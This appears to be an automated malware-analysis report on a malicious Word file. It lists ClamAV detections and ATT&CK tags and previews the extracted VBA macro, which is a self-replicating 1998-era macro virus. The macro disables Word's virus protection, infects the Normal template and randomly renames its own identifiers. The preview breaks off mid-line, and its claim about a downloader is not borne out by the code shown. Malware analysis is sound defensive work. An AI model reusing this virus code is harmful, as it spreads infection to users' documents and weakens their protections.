MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with multiple signatures, including Win.Trojan.Pivis-2 and Doc.Trojan.Pri-1. It contains a Document_Open VBA macro that is designed to execute code when the document is opened. The macro attempts to modify the document's VBA project, suggesting it's part of a mechanism to download and execute a secondary payload.
Heuristics 3
-
ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Pivis-2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 24804 bytes |
SHA-256: bc7be86e3862237711758dcb2380e76ba85257da4bd3a249af1ecdd5c2cb2b15 |
|||
|
Detection
ClamAV:
Doc.Trojan.Pri-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
Options.ConfirmConversions = False: Options.VirusProtection = False: Options.SaveNormalPrompt = False
If Day(Now) > Minute(Now) Then
Randomize: For BM9690 = 1 To (Int(Rnd * 70))
ActiveDocument.Shapes.AddShape(Int(Rnd * 120), Int(Rnd * 200), Int(Rnd * 500), Int(Rnd * 500), Int(Rnd * 500)).Select
Selection.ShapeRange.Fill.ForeColor.RGB = RGB(Int(Rnd * 255), Int(Rnd * 255), Int(Rnd * 255))
Selection.ShapeRange.Fill.Visible = msoTrue
Selection.ShapeRange.Fill.Solid: Next BM9690: End If
MC239 = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
PI2867 = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
If Left(ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 3), 3) <> "Pri" Then
Set GA7183 = ActiveDocument.VBProject.VBComponents.Item(1)
BI4214 = True
End If
If Left(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 3), 3) <> "Pri" Then
Set GA7183 = NormalTemplate.VBProject.VBComponents.Item(1)
QJ6392 = True
Call BE4811_RR8122
ActiveDocument.Saved = True
End If
If QJ6392 <> True And BI4214 <> True Then GoTo DF436
If QJ6392 = True Then GA7183.CodeModule.AddFromString ("Private Sub Document_Close()" & vbCr & ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(2, MC239 - 1) & vbCr & "Sub ViewVBCode()" & vbCr & "Application.Quit SaveChanges:=wdDoNotSaveChanges" & vbCr & "End Sub")
If BI4214 = True Then GA7183.CodeModule.AddFromString ("Private Sub Document_Open()" & vbCr & NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, PI2867 - 4))
DF436:
If PI2867 <> 0 And MC239 = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
End Sub 'W97M/PSD.II ...logically delicious! [(c)1998 ALT-F11 code hack]
Private Function BE4811_RR8122()
On Error Resume Next
Randomize
Dim r1(1 To 15) As String
r1(1) = "FH2199": r1(2) = "FU21": r1(3) = "CR3095": r1(4) = "EU6751": r1(5) = "RR8122": r1(6) = "MC239"
r1(7) = "PI2867": r1(8) = "BI4214":: r1(9) = "GA7183": r1(10) = "QJ6392": r1(11) = "DF436": r1(12) = "BE4811": r1(13) = "SB6857": r1(14) = "NK2928": r1(15) = "BM9690"
For BM9690 = 1 To 15
a1 = (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & Int(Rnd * 100) & Int(Rnd * 100)
Call RR8122(a1, r1(BM9690))
Next BM9690
End Function 'VAMP v1.0 [thanks Vic!]
Private Function RR8122(NK2928, SB6857 As String)
On Error Resume Next
Dim FH2199 As Long: Dim FU21 As Long: Dim CR3095 As Long: Dim EU6751 As Long
With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
FH2199 = 1: FU21 = 1: CR3095 = .CountOfLines: EU6751 = Len(.Lines(.CountOfLines, 1))
Do While .Find(SB6857, FH2199, FU21, CR3095, EU6751, True)
strline = .Lines(FH2199, 1)
strline = Left(strline, FU21 - 1) & NK2928 & Mid(strline, EU6751)
.replaceline FH2199, strline
FH2199 = CR3095 + 1: FU21 = 1:
CR3095 = .CountOfLines
EU6751 = Len(.Lines(.CountOfLines, 1))
Loop
End With
End Function
Private Sub Document_C()
On Error Resume Next
Options.ConfirmConversions = 0: Options.VirusProtection = 0: Options.SaveNormalPrompt = 0
If Day(Now) = Minute(Now) Then
Randomize: For LP6860 = 1 To (Int(Rnd * 70))
ActiveDocument.Shapes.AddShape(Int(Rnd * 120), Int(Rnd * 200), Int(Rnd * 500), Int(Rnd * 500), Int(Rnd * 500)).Select
Selection.ShapeRange.Fill.ForeColor.RGB = RGB(Int(Rnd * 255), Int(Rnd * 255), Int(Rnd * 255))
Selection.ShapeRange.Fill.Visible = msoTrue
Selection.ShapeRange.Fill.Solid: Next LP6860: End If
KQ8133 = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
CM9031 = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
If Left
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.